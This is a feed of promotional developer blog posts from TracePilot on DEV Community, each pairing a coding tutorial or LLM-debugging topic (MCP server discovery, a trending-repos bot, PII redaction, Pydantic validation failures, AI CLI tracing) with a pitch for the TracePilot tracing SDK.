DEV Community: Tracepilot

The MCP Server Directory Problem Nobody's Talking About

Tracepilot — Mon, 27 Jul 2026 15:30:44 +0000

The MCP Server Directory Problem Nobody's Talking About

Here's what's breaking: you built an MCP server. It works. You want people to find it. But discovery is a mess.

GitHub search returns 47 pages of random repos. Twitter threads get buried. Discord channels scroll past in hours. Your server sits in a repo with 3 stars and zero users.

This sucks. I know. I've been there.

Why Discovery Matters (And Why It's Broken)

MCP (Model Context Protocol) is growing fast. Every week there's a new server for databases, APIs, file systems, you name it. But the ecosystem is fragmented.

Here's the technical reality:

No centralized registry exists
GitHub topics are inconsistent (mcp-server, mcp-server-tool, mcp)
Package managers don't index MCP servers specifically
Search engines return noise, not signal

Guess what happens next? Developers waste hours finding the right server. Or worse — they build one that already exists.

The Manual Fix: What You'd Do Without a Directory

Let's say you want to find an MCP server for PostgreSQL. Here's your workflow:

# Step 1: Search GitHub
gh search repos "mcp postgresql" --limit 50

# Step 2: Manually inspect each repo
# Check README, check if it's active, check if it works with your stack

# Step 3: Try to install
npx @modelcontextprotocol/server-postgres

# Step 4: It fails. No docs. No examples. Back to step 1.

Sound familiar? You've spent 30 minutes and found maybe 3 viable servers.

Or if you're submitting your own server:

# Create a GitHub repo
# Write docs
# Post on Hacker News
# Tweet about it
# Pray someone finds it

That's not a workflow. That's a gamble.

The Real Fix: A Directory That Actually Works

mcp.so is trying to solve this. They're building a curated directory of MCP servers. The idea is simple: one place to find and submit servers.

Here's how you submit yours right now:

1. Go to the GitHub issue

URL: https://github.com/chatmcp/mcpso/issues/1

2. Leave your server link

## My MCP Server

**Name:** postgres-mcp  
**Description:** MCP server for PostgreSQL databases with schema introspection and query execution  
**Link:** https://github.com/yourname/postgres-mcp  
**Category:** Database  
**Stack:** Node.js, PostgreSQL

3. Wait for it to appear

The maintainers review and add it to the directory.

That's it. No API. No auth. Just a GitHub issue.

Why This Pattern Works (And When It Doesn't)

The GitHub issue submission pattern has tradeoffs:

Pros:

Low friction — anyone with a GitHub account can submit
Transparent — you can see all submissions
Community vetted — issues get comments, feedback

Cons:

Manual review — takes time
No automation — no CI/CD, no validation
Scales poorly — 1000 servers = 1000 issues

For a v1, it's fine. For production, you'd want something better.

What I'd Build Instead

If I were building this, here's what the submission flow would look like:

// mcp-directory/submit.ts
interface MCPServerSubmission {
  name: string;
  description: string;
  repository: string;       // GitHub URL
  packageName?: string;     // npm package
  category: 'database' | 'api' | 'filesystem' | 'ai' | 'other';
  stack: string[];          // ['node', 'python', 'go']
  mcpVersion: string;       // '2024-11-05'
  tools: string[];          // ['query', 'introspect', 'migrate']
  verified: boolean;        // Auto-verified via GitHub Actions
}

async function submitServer(submission: MCPServerSubmission) {
  // 1. Validate the repository exists
  const repo = await validateGitHubRepo(submission.repository);

  // 2. Check if it actually implements MCP
  const mcpConfig = await fetchMCPSchema(submission.repository);

  // 3. Run basic tests
  const testResults = await runMCPServerTests(mcpConfig);

  // 4. Submit to directory
  const entry = await createDirectoryEntry({
    ...submission,
    verified: testResults.passed,
    submittedAt: new Date().toISOString()
  });

  return entry;
}

But that's overengineering for a v0. The GitHub issue works. Use it.

How TracePilot Fits (Yes, There's a Connection)

You're building MCP servers. They call LLMs. Those LLM calls fail in weird ways.

TracePilot captures every LLM call in your MCP server — input, output, tokens, latency. When something breaks, you fork the execution at the exact step and replay with a fix.

// Your MCP server + TracePilot
import { TracePilot } from 'tracepilot-sdk';

const tp = new TracePilot(process.env.TRACEPILOT_API_KEY);

server.tool('query-database', {
  // ... schema
}, async (args) => {
  return await tp.wrapOpenAI(
    () => llm.generateSQL(args.question),
    [{ role: 'user', content: args.question }]
  );
});

Your MCP server gets discovered on mcp.so. Your LLM calls get debugged with TracePilot. Two problems, one afternoon.

Go Submit

Submit your MCP server here. Leave the link. Get visibility.

And while you're at it, add TracePilot to your server. You'll thank me when it breaks at 2 AM.

Debugging AI agents shouldn't feel like reading The Matrix.
Join other engineers who are building reliable autonomous workflows in our community: TracePilot Discord

Build a Daily Python Trending Repos Notifier with GitHub Issues

Tracepilot — Fri, 24 Jul 2026 15:47:51 +0000

Build a Daily Python Trending Repos Notifier with GitHub Issues

What we're building: A bot that watches GitHub's daily trending Python repos and posts them automatically as a GitHub Issue comment — so you never miss what's hot in the Python ecosystem.

Prerequisites

Node.js 18+
A GitHub account (free tier works)
An OpenAI API key (for the AI summary)
A TracePilot API key (free tier available)

Step 1: Set Up the Project

mkdir python-trending-notifier
cd python-trending-notifier
npm init -y
npm install axios cheerio cron node-cron openai tracepilot-sdk

You'll also need a GitHub personal access token with repo scope. Create one here.

Step 2: Scrape GitHub Trending Python Repos

// lib/scraper.js
import axios from 'axios';
import * as cheerio from 'cheerio';

export async function getTrendingPythonRepos() {
  const { data } = await axios.get('https://github.com/trending/python?since=daily', {
    headers: { 'User-Agent': 'Mozilla/5.0' }
  });

  const $ = cheerio.load(data);
  const repos = [];

  $('article.Box-row').each((i, el) => {
    const name = $(el).find('h2 a').text().trim().replace(/\s+/g, '');
    const description = $(el).find('p').text().trim();
    const stars = $(el).find('.octicon-star').parent().text().trim();
    const forks = $(el).find('.octicon-repo-forked').parent().text().trim();
    const todayStars = $(el).find('.float-sm-right').text().trim();

    repos.push({
      name,
      description: description || 'No description',
      stars: stars || '0',
      forks: forks || '0',
      todayStars: todayStars || '0 stars today',
      url: `https://github.com/${name}`
    });
  });

  return repos.slice(0, 10); // Top 10
}

This scrapes the GitHub trending page for Python repos. It's the same data you see at github.com/trending/python?since=daily — but now you own it.

Step 3: Generate an AI Summary

// lib/summarizer.js
import OpenAI from 'openai';

const openai = new OpenAI({ apiKey: process.env.OPENAI_API_KEY });

export async function generateSummary(repos) {
  const prompt = `Summarize today's top 10 trending Python repos in 3-4 sentences. 
Focus on patterns (e.g., "lots of AI tools this week" or "a new web framework emerged").
Repos: ${repos.map(r => `${r.name}: ${r.description}`).join('\n')}`;

  const response = await openai.chat.completions.create({
    model: 'gpt-4o-mini',
    messages: [{ role: 'user', content: prompt }],
    max_tokens: 150
  });

  return response.choices[0].message.content;
}

You got this. The AI turns raw repo data into a readable trend report — no manual digging required.

Step 4: Post to a GitHub Issue

// lib/github.js
import axios from 'axios';

export async function postToIssue(repos, summary) {
  const body = `## 🐍 Python Trending Repos — ${new Date().toDateString()}

${summary}

### Top 10 Repos

${repos.map((r, i) => `${i + 1}. **[${r.name}](${r.url})** — ${r.description}
   ⭐ ${r.stars} · 🍴 ${r.forks} · 🔥 ${r.todayStars}`).join('\n\n')}

---

*Automated daily update via [github-trending-repos](https://github.com/vitalets/github-trending-repos)*`;

  await axios.post(
    `https://api.github.com/repos/vitalets/github-trending-repos/issues/7/comments`,
    { body },
    {
      headers: {
        Authorization: `Bearer ${process.env.GITHUB_TOKEN}`,
        'User-Agent': 'trending-bot'
      }
    }
  );
}

Replace the owner/repo and issue number with your own. The comment gets posted right under the issue — subscribers get notified automatically.

Step 5: Wire It All Together

// index.js
import cron from 'node-cron';
import { getTrendingPythonRepos } from './lib/scraper.js';
import { generateSummary } from './lib/summarizer.js';
import { postToIssue } from './lib/github.js';

async function run() {
  console.log('Fetching trending Python repos...');
  const repos = await getTrendingPythonRepos();

  console.log('Generating AI summary...');
  const summary = await generateSummary(repos);

  console.log('Posting to GitHub issue...');
  await postToIssue(repos, summary);

  console.log('✅ Done!');
}

// Run daily at 9 AM
cron.schedule('0 9 * * *', run);

// Run immediately on first start
run();

That's it. Three files, one cron job. Your bot is ready.

Adding Observability

This is where TracePilot comes in. When your bot fails at 3 AM (and it will — GitHub rate limits, malformed HTML, API timeouts), you need to know why.

npm install tracepilot-sdk

Now wrap your main function:

// index.js (updated)
import { TracePilot } from 'tracepilot-sdk';
import cron from 'node-cron';
import { getTrendingPythonRepos } from './lib/scraper.js';
import { generateSummary } from './lib/summarizer.js';
import { postToIssue } from './lib/github.js';

const tp = new TracePilot(process.env.TRACEPILOT_API_KEY);

async function run() {
  await tp.startTrace('python-trending-bot');

  const { result: repos } = await tp.wrapToolCall(
    'scrape-trending',
    () => getTrendingPythonRepos(),
    null, 1
  );

  const { result: summary } = await tp.wrapOpenAI(
    () => generateSummary(repos),
    [{ role: 'user', content: `Summarize: ${repos.map(r => r.name).join(', ')}` }],
    null, 2
  );

  await tp.wrapToolCall(
    'post-to-github',
    () => postToIssue(repos, summary),
    null, 3,
    true // destructive — modifies GitHub state
  );
}

cron.schedule('0 9 * * *', run);
run();

One line change per step. Now every scrape, every AI call, every GitHub post is tracked in your TracePilot Dashboard. When the bot fails, you see exactly where — and you can fork the execution to test fixes without redeploying.

Next Steps

Your bot is live. Here's what to do next:

Deploy it — Use a free cron service like Cron-job.org or Railway. Set the three env vars (GITHUB_TOKEN, OPENAI_API_KEY, TRACEPILOT_API_KEY).
Add error handling — Wrap the scraper in a retry loop. GitHub's HTML changes sometimes.
Extend to other languages — Change the URL to /trending/javascript or /trending/rust. One line.
Watch the dashboard — Open tracepilotai.com/dashboard after the first run. You'll see the full execution tree.

You just built a production-grade trending repo notifier. No complex infrastructure, no Docker, no Kubernetes. Three files, one cron job, and a dashboard that shows you everything.

You got this.

Debugging AI agents shouldn't feel like reading The Matrix.
Join other engineers who are building reliable autonomous workflows in our community: TracePilot Discord

The AI Assistant You Didn't Ask For (But Your Users Will)

Tracepilot — Mon, 20 Jul 2026 16:52:31 +0000

The AI Assistant You Didn't Ask For (But Your Users Will)

Here's the thing about shipping an MCP server: you build it, you document it, you move on. Then someone asks "can I chat with my data?" and suddenly you're looking at a six-month project.

Plane already has plane-mcp-server. It exposes issues, cycles, projects — everything via the Model Context Protocol. Claude Desktop can query it. Cursor can use it. But your users? They're in the browser. They don't care about MCP. They want a text box.

So here's the proposal: feature-flagged, disabled-by-default AI Assistant that talks to Plane through its own MCP server.

Not a rewrite. Not a new API. Same protocol, different client.

The Architecture

Browser UI  →  AI Assistant Component  →  Next.js API Route
                                                ↓
                                    plane-mcp-server (localhost or container)
                                                ↓
                                    Plane Database (PostgreSQL)

The MCP server already handles authentication, query construction, and data access. The AI Assistant is just a new consumer of that same interface.

// app/api/ai/chat/route.ts
import { Client } from "@modelcontextprotocol/sdk/client/index.js";
import { StdioClientTransport } from "@modelcontextprotocol/sdk/client/stdio.js";

const transport = new StdioClientTransport({
  command: "node",
  args: ["plane-mcp-server/dist/index.js"],
  env: {
    PLANE_API_KEY: process.env.PLANE_API_KEY,
    PLANE_BASE_URL: process.env.PLANE_BASE_URL,
  },
});

const client = new Client({
  name: "plane-ai-assistant",
  version: "1.0.0",
});

await client.connect(transport);

export async function POST(req: Request) {
  const { query } = await req.json();

  const result = await client.request({
    method: "tools/call",
    params: {
      name: "plane_query",
      arguments: { query },
    },
  });

  return Response.json(result);
}

That's it. The MCP server becomes your AI backend. No separate vector store. No custom RAG pipeline. Just the protocol you already own.

Feature Flagging

This stays off by default. Why? Because AI costs money, and not everyone wants it.

// lib/features.ts
export const FEATURES = {
  AI_ASSISTANT: process.env.NEXT_PUBLIC_ENABLE_AI_ASSISTANT === "true",
};

// components/Sidebar.tsx
import { FEATURES } from "@/lib/features";

export function Sidebar() {
  return (
    <aside>
      <ProjectList />
      {FEATURES.AI_ASSISTANT && <AIAssistant />}
    </aside>
  );
}

One env var. One toggle. Zero risk.

The UI

Three components. That's all.

// components/AIAssistant.tsx
"use client";

import { useState } from "react";
import { ChatInput } from "./ChatInput";
import { ChatMessages } from "./ChatMessages";

export function AIAssistant() {
  const [messages, setMessages] = useState<
    { role: "user" | "assistant"; content: string }[]
  >([]);
  const [isLoading, setIsLoading] = useState(false);

  const sendMessage = async (content: string) => {
    setMessages((prev) => [...prev, { role: "user", content }]);
    setIsLoading(true);

    const res = await fetch("/api/ai/chat", {
      method: "POST",
      body: JSON.stringify({ query: content }),
    });

    const data = await res.json();
    setMessages((prev) => [
      ...prev,
      { role: "assistant", content: data.content },
    ]);
    setIsLoading(false);
  };

  return (
    <div className="border rounded-lg p-4 space-y-4">
      <ChatMessages messages={messages} isLoading={isLoading} />
      <ChatInput onSend={sendMessage} disabled={isLoading} />
    </div>
  );
}

The MCP server handles the heavy lifting. Your UI is just a pipe.

What It Can Do Right Now

With plane-mcp-server exposing tools like list_issues, get_cycle, search_projects, the AI can answer:

"Show me all high-priority bugs in the current sprint"
"What's the status of issue PLANE-1234?"
"Which projects have overdue tasks?"

No training. No fine-tuning. The MCP server translates natural language into structured queries against your existing data.

What You're Not Doing

Not building a vector database. The MCP server queries Postgres directly.
Not training a model. You're using GPT-4o or Claude via the MCP server.
Not rewriting auth. The MCP server handles API keys and permissions.
Not deploying new infrastructure. It runs in a container alongside Plane.

The Caveats

This isn't production-ready magic. Here's what breaks:

Latency. MCP over stdio means a subprocess per request. For production, you'd want the MCP server running as a persistent HTTP service.

Cost. Every query hits an LLM. Without caching, a busy team could burn through tokens fast. Add a simple cache:

const cache = new Map<string, string>();

export async function POST(req: Request) {
  const { query } = await req.json();

  if (cache.has(query)) {
    return Response.json({ content: cache.get(query) });
  }

  // ... MCP call ...

  cache.set(query, result.content);
  return Response.json(result);
}

Security. The MCP server has access to everything. Make sure your AI assistant only queries, never mutates. Or add a confirmation dialog for destructive operations.

The Hook

You already built the hard part. plane-mcp-server is a fully functional AI backend sitting in your repo, unused by your own UI.

The AI Assistant proposal isn't about building something new. It's about connecting what you already have to where your users actually work — the browser.

Feature flag it. Ship it disabled. Let power users opt in.

Your MCP server is already talking to your data. It's time your UI started listening.

Debugging AI agents shouldn't feel like reading The Matrix.
Join other engineers who are building reliable autonomous workflows in our community: TracePilot Discord

Build a PII Redaction Pipeline with AWS Comprehend & EdgeChains

Tracepilot — Fri, 17 Jul 2026 15:30:49 +0000

Build a PII Redaction Pipeline with AWS Comprehend & EdgeChains

What we're building: A chainable PII redaction utility that automatically strips sensitive information (names, emails, SSNs, etc.) from prompts before they reach your LLM — using AWS Comprehend and EdgeChains' observable architecture.

Prerequisites

Node.js 18+
An AWS account with Comprehend access
The EdgeChains JS SDK installed: npm install edgechains
AWS SDK v3: npm install @aws-sdk/client-comprehend
An OpenAI API key (for the demo)

Step 1: Set up your project

mkdir pii-redactor
cd pii-redactor
npm init -y
npm install edgechains @aws-sdk/client-comprehend openai dotenv

Create .env:

AWS_ACCESS_KEY_ID=your_key_here
AWS_SECRET_ACCESS_KEY=your_secret_here
AWS_REGION=us-east-1
OPENAI_API_KEY=sk-...

Step 2: Create the Comprehend PII Redactor class

This is the core — a class that wraps AWS Comprehend's detectPiiEntities and redacts matches. It's designed to be chained with EdgeChains' Endpoint classes.

// redactor.ts
import {
  ComprehendClient,
  DetectPiiEntitiesCommand,
  type Entity,
} from "@aws-sdk/client-comprehend";
import { Endpoint } from "edgechains";

type RedactConfig = {
  /** Which PII types to redact. Default: all */
  entityTypes?: string[];
  /** Replacement character. Default: '*' */
  maskChar?: string;
};

export class ComprehendPIIRedactor extends Endpoint {
  private client: ComprehendClient;
  private config: Required<RedactConfig>;

  constructor(config: RedactConfig = {}) {
    super();
    this.client = new ComprehendClient({
      region: process.env.AWS_REGION || "us-east-1",
    });
    this.config = {
      entityTypes: config.entityTypes || [],
      maskChar: config.maskChar || "*",
    };
  }

  /**
   * Detect PII entities in the input text
   */
  private async detectPII(text: string): Promise<Entity[]> {
    const command = new DetectPiiEntitiesCommand({
      Text: text,
      LanguageCode: "en",
    });
    const response = await this.client.send(command);
    return response.Entities || [];
  }

  /**
   * Redact detected PII entities from the text
   */
  private redactPII(text: string, entities: Entity[]): string {
    // Sort entities by offset in reverse to avoid index shifting
    const sorted = [...entities]
      .filter((e) => {
        if (this.config.entityTypes.length === 0) return true;
        return this.config.entityTypes.includes(e.Type!);
      })
      .sort((a, b) => (b.BeginOffset || 0) - (a.BeginOffset || 0));

    let result = text;
    for (const entity of sorted) {
      const start = entity.BeginOffset || 0;
      const end = entity.EndOffset || 0;
      const original = result.slice(start, end);
      const masked = this.config.maskChar.repeat(original.length);
      result = result.slice(0, start) + masked + result.slice(end);
    }
    return result;
  }

  /**
   * The main redact method — chainable with EdgeChains
   * Returns an observable that emits the redacted text
   */
  async redact(input: string): Promise<string> {
    const entities = await this.detectPII(input);
    if (entities.length === 0) {
      console.log("✅ No PII detected");
      return input;
    }

    console.log(`🔍 Found ${entities.length} PII entities:`, 
      entities.map((e) => `${e.Type} at [${e.BeginOffset}-${e.EndOffset}]`).join(", ")
    );

    return this.redactPII(input, entities);
  }
}

Step 3: Chain it with an LLM endpoint

Now the magic — chain the redactor with an OpenAI endpoint so every prompt gets sanitized before the LLM sees it.

// chain.ts
import { Endpoint } from "edgechains";
import OpenAI from "openai";
import { ComprehendPIIRedactor } from "./redactor";

class OpenAIEndpoint extends Endpoint {
  private client: OpenAI;

  constructor() {
    super();
    this.client = new OpenAI({ apiKey: process.env.OPENAI_API_KEY });
  }

  async generate(prompt: string): Promise<string> {
    const response = await this.client.chat.completions.create({
      model: "gpt-4o-mini",
      messages: [{ role: "user", content: prompt }],
    });
    return response.choices[0]?.message?.content || "";
  }
}

async function main() {
  const redactor = new ComprehendPIIRedactor({
    entityTypes: ["NAME", "EMAIL", "PHONE", "SSN"], // only redact these types
    maskChar: "█",
  });

  const llm = new OpenAIEndpoint();

  // The chain: prompt → redact PII → send to LLM
  const rawPrompt = `Hi, I'm John Smith. My email is john.smith@example.com and my SSN is 123-45-6789. Can you help me reset my password?`;

  console.log("📝 Original prompt:", rawPrompt);

  // Chain the endpoints
  const redactedPrompt = await redactor.redact(rawPrompt);
  console.log("🛡️  Redacted prompt:", redactedPrompt);

  const response = await llm.generate(redactedPrompt);
  console.log("🤖 LLM response:", response);
}

main().catch(console.error);

Step 4: Add observability with TracePilot

This is where debugging becomes obvious. Add TracePilot to see exactly what PII was redacted, when, and how the LLM responded.

npm install tracepilot-sdk


typescript
// tracepilot-chain.ts
import { TracePilot } from "tracepilot-sdk";
import { ComprehendPIIRedactor } from "./redactor";
import { Endpoint } from "edgechains";
import OpenAI from "openai";

const tp = new TracePilot(process.env.TRACEPILOT_API_KEY!);

class ObservableRedactor extends ComprehendPIIRedactor {
  async redact(input: string): Promise<string> {
    return await tp.wrapToolCall(
      "comprehend-pii-redaction",
      () => super.redact(input),
      undefined, // parent span — set if chaining
      1,         // step order
      true       // destructive? Yes — we're modifying data
    );
  }
}

class ObservableLLM extends Endpoint {
  private client: OpenAI;

  constructor() {
    super();
    this.client = new OpenAI({ apiKey: process.env.OPENAI_API_KEY });
  }

  async generate(prompt: string): Promise<string> {
    const { result } = await tp.wrapOpenAI(
      () =>
        this.client.chat.completions.create({
          model: "gpt-4o-mini",
          messages: [{ role: "user", content: prompt }],
        }),
      [{ role: "user", content: prompt }]
    );
    return result.choices[0]?.message?.content || "";
  }
}

async function main() {
  await tp.startTrace("pii-redaction-pipeline");

  const redactor = new ObservableRedactor({
    entityTypes: ["NAME", "EMAIL", "PHONE", "SSN"],
    maskChar: "█",
  });

  const llm = new ObservableLLM();

  const rawPrompt = `Call me at 555-123-4567 or email support@bank.com. My name is Jane Doe.`;
  const redactedPrompt = await redactor.redact(rawPrompt);
  const response = await llm.generate(redactedPrompt);

  console.log("Final response:",

---

**Debugging AI agents shouldn't feel like reading The Matrix.** 
Join other engineers who are building reliable autonomous workflows in our community: [TracePilot Discord](https://discord.gg/KzXRAXFM8)

That Pydantic Validation Error That Dropped Your Chunk

Tracepilot — Mon, 13 Jul 2026 16:54:55 +0000

That Pydantic Validation Error That Dropped Your Chunk

Your extraction pipeline fails silently. One chunk out of fifty gets dropped. You notice hours later when a user asks about data that should be there.

Here's what happened:

graphiti-service: Error ingesting chunk <doc>#chunk-22: 
1 validation error for ExtractedEntitiesFreeform

That's it. No field name. No type mismatch. Just "1 validation error." The chunk is gone. The doc is incomplete. Good luck figuring out which entity field broke.

Why This Happens

You're calling Claude Sonnet (or GPT-4o) to extract structured entities from a chunk of text. The prompt says "return valid JSON matching this schema." The LLM returns something that looks right — but isn't.

The common failure modes:

Field name drift:

# Your schema expects:
class ExtractedEntitiesFreeform(BaseModel):
    entities: list[Entity]
    relationships: list[Relationship]

# LLM returns:
{
    "entities": [...],
    "relations": [...]  # Wrong field name
}

Type mismatch:

# Schema says:
class Entity(BaseModel):
    name: str
    confidence: float

# LLM returns:
{
    "name": "Acme Corp",
    "confidence": "high"  # String, not float
}

Nested structure collapse:

# Expected:
{
    "entities": [
        {
            "name": "Acme",
            "properties": {"industry": "tech"}
        }
    ]
}

# Returned:
{
    "entities": [
        {
            "name": "Acme",
            "industry": "tech"  # Flattened
        }
    ]
}

The LLM is trying to be helpful. It's not. It's generating structurally valid JSON that doesn't match your Pydantic model. And Pydantic gives you a one-line error with no context about which field failed.

The Manual Fix

You have two options:

Option 1: Retry with better error messages

from pydantic import ValidationError

def extract_entities(text: str) -> ExtractedEntitiesFreeform | None:
    try:
        response = llm.call(
            model="claude-sonnet-4-20250514",
            messages=[{
                "role": "user",
                "content": f"Extract entities from:\n\n{text}"
            }],
            response_format={"type": "json_object"}
        )

        data = json.loads(response.content)
        return ExtractedEntitiesFreeform(**data)

    except ValidationError as e:
        # This still won't tell you which field
        logger.error(f"Validation failed: {e.errors()}")
        return None

    except json.JSONDecodeError as e:
        logger.error(f"Invalid JSON: {e}")
        return None

The e.errors() gives you a list of errors, but if the LLM returned a completely wrong structure (like nesting entities under a different key), you get a generic "field required" error.

Option 2: Validate before parsing

def validate_llm_response(raw: dict) -> ExtractedEntitiesFreeform | None:
    """Pre-validate and normalize common LLM quirks"""

    # Handle field name drift
    if "relations" in raw and "relationships" not in raw:
        raw["relationships"] = raw.pop("relations")

    # Handle nested structure issues
    if "entities" in raw:
        for entity in raw["entities"]:
            # Normalize confidence scores
            if isinstance(entity.get("confidence"), str):
                try:
                    entity["confidence"] = float(entity["confidence"].replace("%", "")) / 100
                except ValueError:
                    entity["confidence"] = 0.5  # Default

    try:
        return ExtractedEntitiesFreeform(**raw)
    except ValidationError as e:
        logger.error(f"LLM response structure: {json.dumps(raw, indent=2)}")
        logger.error(f"Validation errors: {e.errors()}")
        return None

This works. But you're writing defensive code for every schema change. Every new field is another normalization rule. It's brittle and it doesn't scale.

The Real Problem

You're debugging blind. You have:

The input text (chunk 22)
The LLM response (truncated error message)
The failed validation (no field context)

What you don't have is the exact LLM output that failed. You can't see what Claude actually returned. You can't replay the extraction with a fixed prompt. You're guessing.

Enter TracePilot

One line change:

from tracepilot import TracePilot

tp = TracePilot(api_key="tp_live_YOUR_KEY")

async def extract_entities(text: str):
    await tp.start_trace("entity-extraction")

    response = await tp.wrap_llm_call(
        llm_fn=lambda: client.messages.create(
            model="claude-sonnet-4-20250514",
            max_tokens=1024,
            messages=[{
                "role": "user",
                "content": f"Extract entities from:\n\n{text}"
            }]
        ),
        metadata={"chunk_id": "chunk-22", "doc_id": "doc-123"}
    )

    raw = json.loads(response.content[0].text)

    try:
        entities = ExtractedEntitiesFreeform(**raw)
        await tp.log_success(entities.dict())
        return entities
    except ValidationError as e:
        # TracePilot captures the full LLM output
        await tp.log_failure({
            "error": str(e),
            "raw_response": raw,  # Now you can see it
            "validation_errors": e.errors()
        })
        return None

Now when chunk 22 fails, you open your TracePilot dashboard. You see:

The exact JSON Claude returned
Which field failed validation
The full error trace

Click Fork & Rerun. Edit the prompt to add "use 'relationships' not 'relations'". Replay. The fix takes 30 seconds. No redeployment.

The Hook

You've got 47 more chunks to process. Each one could fail with a different LLM quirk. You could write defensive code for every edge case. Or you could add one import and see exactly what the LLM returned when it broke.

Sound familiar?

Get your free API key — the first 10k traces are on us. Your debugging time is worth more than that.

Debugging AI agents shouldn't feel like reading The Matrix.
Join other engineers who are building reliable autonomous workflows in our community: TracePilot Discord

AI CLI Tools Are Eating Each Other's Lunch

Tracepilot — Mon, 06 Jul 2026 16:43:29 +0000

AI CLI Tools Are Eating Each Other's Lunch

Here's what's happening in 2026.

Every AI company ships a CLI tool. Claude Code. OpenAI Codex. Gemini CLI. GitHub Copilot CLI. Kimi Code. OpenCode. Pi. Qwen Code.

They all do the same thing. Read your repo. Write code. Run commands. Make mistakes.

The problem isn't which one to pick. It's that they're all opaque black boxes that fail in exactly the same ways.

The Failure Pattern Never Changes

You ask an AI CLI to fix a bug. It reads 47 files. Spends $1.20 in tokens. Writes a "fix" that breaks your build.

You have no idea why.

Was it the prompt? Did it misinterpret a file? Did it hallucinate an API that doesn't exist? Did it get stuck in a loop rewriting the same function?

Traditional debugging is archaeology. You dig through terminal output. You guess. You try again with a slightly different prompt. Maybe it works. Maybe it doesn't.

Sound familiar?

What Actually Happens Under The Hood

Let's look at a real failure. Claude Code was asked to refactor a React component. Here's what the trace showed:

Step 1: Read src/components/UserProfile.tsx (success)
Step 2: Read src/hooks/useUser.ts (success)  
Step 3: Read src/types/user.d.ts (success)
Step 4: Generate new component (success, 847 tokens)
Step 5: Write to src/components/UserProfile.tsx (success)
Step 6: Run tests (FAILURE - 3 failing tests)

The tool reported "task completed with test failures." Useless.

With proper tracing, you see the actual state at each step:

{
  "step": 4,
  "input_tokens": 1247,
  "output_tokens": 847,
  "prompt_preview": "Refactor UserProfile to use the new useUser hook pattern...",
  "output_preview": "export function UserProfile({ userId }: { userId: string }) { ... }",
  "tool_calls": [
    { "name": "read_file", "args": { "path": "src/types/user.d.ts" }, "result": "..." },
    { "name": "write_file", "args": { "path": "src/components/UserProfile.tsx" }, "result": "success" }
  ],
  "latency_ms": 3402,
  "cost_usd": 0.047
}

Now you can see the problem. The model read user.d.ts but didn't read the actual API contract in api/users.ts. It invented a field that doesn't exist.

The Manual Fix That Works

You don't need a fancy tool for this. You need to instrument your AI CLI calls.

Here's the bare minimum approach:

# Wrap the CLI call with timing and output capture
time (claude-code "refactor UserProfile" 2>&1) | tee claude_run_$(date +%s).log

# Parse the log for failures
grep -i "error\|fail\|exception" claude_run_*.log

But that's garbage. You get the same flat log everyone else has.

The One-Line Change That Changes Everything

Instead of wrapping the output, wrap the calls.

import { TracePilot } from 'tracepilot-sdk';

const tp = new TracePilot(process.env.TRACEPILOT_API_KEY);

// Before:
const result = await claudeCode.refactor('UserProfile', files);

// After:
const { result, spanId } = await tp.wrapToolCall(
  'refactor-component',
  () => claudeCode.refactor('UserProfile', files),
  parentSpanId,
  4
);

That's it. One line changed. Now every tool call is tracked.

When the build breaks, you open the dashboard. You see the exact state at step 4 — the prompt, the files read, the output, the tokens, the latency. You click "Fork & Rerun". You edit the prompt to say "also read api/users.ts". You hit replay.

No redeployment. No "works on my machine". No guessing.

Why This Actually Matters

AI CLI tools are becoming the default way developers interact with codebases. They're not toys anymore. They're writing production code, running deployments, modifying databases.

The cost of failure is real.

Failure	Without TracePilot	With TracePilot
Hallucinated API	Debug 45 min	Fork, fix prompt, 30 sec
Wrong refactor	Revert, retry, 2 hrs	See exact state, fix one line
Token explosion	Find in billing, too late	See it happening live

The Pattern Is Always The Same

Every AI CLI tool follows the same pattern:

Read context (files, git history, docs)
Generate plan
Execute tool calls (write files, run commands)
Verify result

The failures happen at step 2 or 3. And without tracing, you're blind.

TracePilot gives you eyes. One import. One wrapper. Done.

Next time your AI CLI tool ships garbage, you'll know exactly why. And you'll fix it in seconds, not hours.

Get your free API key. Fork a failing run. See what your agent actually did.

Debugging AI agents shouldn't feel like reading The Matrix.
Join other engineers who are building reliable autonomous workflows in our community: TracePilot Discord

Build an AI Video Platform with BoTTube: A Developer's Tutorial

Tracepilot — Sat, 04 Jul 2026 03:53:41 +0000

Build an AI Video Platform with BoTTube: A Developer's Tutorial

What we're building: A fully functional AI-powered video platform that generates, processes, and serves content — all running on your local machine with BoTTube's open-source stack.

Prerequisites

Node.js 18+ installed
Python 3.9+ installed
FFmpeg (for video processing)
An OpenAI API key (for AI generation)
15 minutes of your time

Step 1: Clone and Set Up BoTTube

BoTTube is an AI video platform that's already processed 1000+ videos. Let's get it running locally.

# Clone the repository
git clone https://github.com/ElyanLabs/bottube.git
cd bottube

# Install dependencies
npm install
pip install -r requirements.txt

# Copy environment config
cp .env.example .env

Open .env and add your API keys:

OPENAI_API_KEY=sk-your-key-here
VIDEO_STORAGE_PATH=./videos
PORT=3000

Step 2: Start the Video Processing Pipeline

BoTTube's pipeline handles everything from script generation to final export. Let's start the core services:

# Terminal 1: Start the API server
npm run dev

# Terminal 2: Start the video processor
python -m bottube.processor --workers 4

You should see:

[BoTTube] API server running on http://localhost:3000
[BoTTube] Video processor initialized with 4 workers

Step 3: Generate Your First AI Video

Now let's create a video programmatically. Create a file called generate.js:

// generate.js
import { BoTTubeClient } from 'bottube-sdk';

const client = new BoTTubeClient({
  apiKey: process.env.OPENAI_API_KEY,
  endpoint: 'http://localhost:3000'
});

async function createVideo() {
  // Define your video content
  const video = await client.create({
    script: "Explain quantum computing in 60 seconds",
    style: "educational",
    duration: 60, // seconds
    voice: "en-US-neural",
    background: "gradient-blue"
  });

  console.log(`Video created: ${video.id}`);
  console.log(`Status: ${video.status}`);

  // Poll until complete
  while (video.status !== 'complete') {
    await new Promise(r => setTimeout(r, 2000));
    const status = await client.getStatus(video.id);
    console.log(`Processing: ${status.progress}%`);

    if (status.status === 'complete') break;
  }

  console.log(`✅ Video ready at: ${video.url}`);
}

createVideo().catch(console.error);

Run it:

node generate.js

You'll see progress updates. In about 30 seconds, your first AI-generated video is ready.

Step 4: Build a Video Feed API

Let's create an API endpoint that serves your generated videos:

# api/feed.py
from fastapi import FastAPI, Query
from bottube import VideoManager
from typing import Optional

app = FastAPI()
manager = VideoManager(storage_path="./videos")

@app.get("/api/feed")
async def get_feed(
    limit: int = Query(10, ge=1, le=50),
    category: Optional[str] = None,
    sort: str = "newest"
):
    """Get a paginated feed of AI-generated videos"""

    videos = manager.list_videos(
        limit=limit,
        category=category,
        sort_by=sort
    )

    return {
        "videos": videos,
